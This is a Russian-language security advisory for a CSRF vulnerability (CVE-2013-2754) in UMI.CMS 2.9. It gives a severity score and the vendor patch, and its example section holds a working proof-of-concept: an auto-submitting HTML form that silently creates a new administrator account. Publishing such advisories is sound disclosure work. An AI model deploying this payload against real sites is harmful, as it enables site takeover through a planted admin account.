CSRF нападение в UMI.CMS

Дата публикации:
13.05.2013
Дата изменения:
14.05.2013
Всего просмотров:
3799
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
(AV:N/AC:H/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C) = Base:5.1/Temporal:4
CVE ID:
CVE-2013-2754
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
PoC код
Уязвимые продукты:
UMI.CMS 2.x
Уязвимые версии: UMI.CMS 2.9 сборка ниже 21905, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов при выполнении некоторых действий. Удаленный пользователь может произвести CSRF нападение и создать нового административного пользователя.

Пример:

<form action="http://[host]/admin/users/add/user/do/" method="post" name="main">
<input type="hidden" name="data[new][login]" value="csrfuser">
<input type="hidden" name="data[new][password][]" value="password">
<input type="hidden" name="data[new][e-mail]" value="user@mail.com">
<input type="hidden" name="data[new][is_activated]" value="1">
<input type="hidden" name="data[new][fname]" value="username">
<input type="hidden" name="data[new][groups][]" value="1">
<input type="hidden" name="data[new][groups][]" value="2">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

URL производителя: http://www.umi-cms.ru

Решение: Установите обновление (версию 2.9 сборка 21905 или выше) с сайта производителя.

Ссылки: http://www.umi-cms.ru/support/changelog/
https://www.htbridge.com/advisory/HTB23151

или введите имя

CAPTCHA